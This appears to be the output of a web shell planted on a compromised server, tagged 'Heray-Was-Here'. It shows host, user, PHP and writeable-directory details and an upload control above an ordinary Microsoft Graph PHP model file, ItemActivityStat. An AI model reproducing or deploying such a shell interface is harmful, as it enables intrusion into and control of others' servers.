Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/includes/microsoft/microsoft-graph/src/Model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/includes/microsoft/microsoft-graph/src/Model/ItemActivityStat.php
<?php
/**
* Copyright (c) Microsoft Corporation.  All Rights Reserved.  Licensed under the MIT License.  See License in the project root for license information.
* 
* ItemActivityStat File
* PHP version 7
*
* @category  Library
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;

/**
* ItemActivityStat class
*
* @category  Model
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
class ItemActivityStat extends Entity
{
    /**
    * Gets the access
    * Statistics about the access actions in this interval. Read-only.
    *
    * @return ItemActionStat|null The access
    */
    public function getAccess()
    {
        if (array_key_exists("access", $this->_propDict)) {
            if (is_a($this->_propDict["access"], "\Microsoft\Graph\Model\ItemActionStat") || is_null($this->_propDict["access"])) {
                return $this->_propDict["access"];
            } else {
                $this->_propDict["access"] = new ItemActionStat($this->_propDict["access"]);
                return $this->_propDict["access"];
            }
        }
        return null;
    }

    /**
    * Sets the access
    * Statistics about the access actions in this interval. Read-only.
    *
    * @param ItemActionStat $val The access
    *
    * @return ItemActivityStat
    */
    public function setAccess($val)
    {
        $this->_propDict["access"] = $val;
        return $this;
    }

    /**
    * Gets the create
    * Statistics about the create actions in this interval. Read-only.
    *
    * @return ItemActionStat|null The create
    */
    public function getCreate()
    {
        if (array_key_exists("create", $this->_propDict)) {
            if (is_a($this->_propDict["create"], "\Microsoft\Graph\Model\ItemActionStat") || is_null($this->_propDict["create"])) {
                return $this->_propDict["create"];
            } else {
                $this->_propDict["create"] = new ItemActionStat($this->_propDict["create"]);
                return $this->_propDict["create"];
            }
        }
        return null;
    }

    /**
    * Sets the create
    * Statistics about the create actions in this interval. Read-only.
    *
    * @param ItemActionStat $val The create
    *
    * @return ItemActivityStat
    */
    public function setCreate($val)
    {
        $this->_propDict["create"] = $val;
        return $this;
    }

    /**
    * Gets the delete
    * Statistics about the delete actions in this interval. Read-only.
    *
    * @return ItemActionStat|null The delete
    */
    public function getDelete()
    {
        if (array_key_exists("delete", $this->_propDict)) {
            if (is_a($this->_propDict["delete"], "\Microsoft\Graph\Model\ItemActionStat") || is_null($this->_propDict["delete"])) {
                return $this->_propDict["delete"];
            } else {
                $this->_propDict["delete"] = new ItemActionStat($this->_propDict["delete"]);
                return $this->_propDict["delete"];
            }
        }
        return null;
    }

    /**
    * Sets the delete
    * Statistics about the delete actions in this interval. Read-only.
    *
    * @param ItemActionStat $val The delete
    *
    * @return ItemActivityStat
    */
    public function setDelete($val)
    {
        $this->_propDict["delete"] = $val;
        return $this;
    }

    /**
    * Gets the edit
    * Statistics about the edit actions in this interval. Read-only.
    *
    * @return ItemActionStat|null The edit
    */
    public function getEdit()
    {
        if (array_key_exists("edit", $this->_propDict)) {
            if (is_a($this->_propDict["edit"], "\Microsoft\Graph\Model\ItemActionStat") || is_null($this->_propDict["edit"])) {
                return $this->_propDict["edit"];
            } else {
                $this->_propDict["edit"] = new ItemActionStat($this->_propDict["edit"]);
                return $this->_propDict["edit"];
            }
        }
        return null;
    }

    /**
    * Sets the edit
    * Statistics about the edit actions in this interval. Read-only.
    *
    * @param ItemActionStat $val The edit
    *
    * @return ItemActivityStat
    */
    public function setEdit($val)
    {
        $this->_propDict["edit"] = $val;
        return $this;
    }

    /**
    * Gets the endDateTime
    * When the interval ends. Read-only.
    *
    * @return \DateTime|null The endDateTime
    */
    public function getEndDateTime()
    {
        if (array_key_exists("endDateTime", $this->_propDict)) {
            if (is_a($this->_propDict["endDateTime"], "\DateTime") || is_null($this->_propDict["endDateTime"])) {
                return $this->_propDict["endDateTime"];
            } else {
                $this->_propDict["endDateTime"] = new \DateTime($this->_propDict["endDateTime"]);
                return $this->_propDict["endDateTime"];
            }
        }
        return null;
    }

    /**
    * Sets the endDateTime
    * When the interval ends. Read-only.
    *
    * @param \DateTime $val The endDateTime
    *
    * @return ItemActivityStat
    */
    public function setEndDateTime($val)
    {
        $this->_propDict["endDateTime"] = $val;
        return $this;
    }

    /**
    * Gets the incompleteData
    * Indicates that the statistics in this interval are based on incomplete data. Read-only.
    *
    * @return IncompleteData|null The incompleteData
    */
    public function getIncompleteData()
    {
        if (array_key_exists("incompleteData", $this->_propDict)) {
            if (is_a($this->_propDict["incompleteData"], "\Microsoft\Graph\Model\IncompleteData") || is_null($this->_propDict["incompleteData"])) {
                return $this->_propDict["incompleteData"];
            } else {
                $this->_propDict["incompleteData"] = new IncompleteData($this->_propDict["incompleteData"]);
                return $this->_propDict["incompleteData"];
            }
        }
        return null;
    }

    /**
    * Sets the incompleteData
    * Indicates that the statistics in this interval are based on incomplete data. Read-only.
    *
    * @param IncompleteData $val The incompleteData
    *
    * @return ItemActivityStat
    */
    public function setIncompleteData($val)
    {
        $this->_propDict["incompleteData"] = $val;
        return $this;
    }

    /**
    * Gets the isTrending
    * Indicates whether the item is 'trending.' Read-only.
    *
    * @return bool|null The isTrending
    */
    public function getIsTrending()
    {
        if (array_key_exists("isTrending", $this->_propDict)) {
            return $this->_propDict["isTrending"];
        } else {
            return null;
        }
    }

    /**
    * Sets the isTrending
    * Indicates whether the item is 'trending.' Read-only.
    *
    * @param bool $val The isTrending
    *
    * @return ItemActivityStat
    */
    public function setIsTrending($val)
    {
        $this->_propDict["isTrending"] = boolval($val);
        return $this;
    }

    /**
    * Gets the move
    * Statistics about the move actions in this interval. Read-only.
    *
    * @return ItemActionStat|null The move
    */
    public function getMove()
    {
        if (array_key_exists("move", $this->_propDict)) {
            if (is_a($this->_propDict["move"], "\Microsoft\Graph\Model\ItemActionStat") || is_null($this->_propDict["move"])) {
                return $this->_propDict["move"];
            } else {
                $this->_propDict["move"] = new ItemActionStat($this->_propDict["move"]);
                return $this->_propDict["move"];
            }
        }
        return null;
    }

    /**
    * Sets the move
    * Statistics about the move actions in this interval. Read-only.
    *
    * @param ItemActionStat $val The move
    *
    * @return ItemActivityStat
    */
    public function setMove($val)
    {
        $this->_propDict["move"] = $val;
        return $this;
    }

    /**
    * Gets the startDateTime
    * When the interval starts. Read-only.
    *
    * @return \DateTime|null The startDateTime
    */
    public function getStartDateTime()
    {
        if (array_key_exists("startDateTime", $this->_propDict)) {
            if (is_a($this->_propDict["startDateTime"], "\DateTime") || is_null($this->_propDict["startDateTime"])) {
                return $this->_propDict["startDateTime"];
            } else {
                $this->_propDict["startDateTime"] = new \DateTime($this->_propDict["startDateTime"]);
                return $this->_propDict["startDateTime"];
            }
        }
        return null;
    }

    /**
    * Sets the startDateTime
    * When the interval starts. Read-only.
    *
    * @param \DateTime $val The startDateTime
    *
    * @return ItemActivityStat
    */
    public function setStartDateTime($val)
    {
        $this->_propDict["startDateTime"] = $val;
        return $this;
    }


     /**
     * Gets the activities
    * Exposes the itemActivities represented in this itemActivityStat resource.
     *
     * @return array|null The activities
     */
    public function getActivities()
    {
        if (array_key_exists("activities", $this->_propDict)) {
           return $this->_propDict["activities"];
        } else {
            return null;
        }
    }

    /**
    * Sets the activities
    * Exposes the itemActivities represented in this itemActivityStat resource.
    *
    * @param ItemActivity[] $val The activities
    *
    * @return ItemActivityStat
    */
    public function setActivities($val)
    {
        $this->_propDict["activities"] = $val;
        return $this;
    }

}

Hry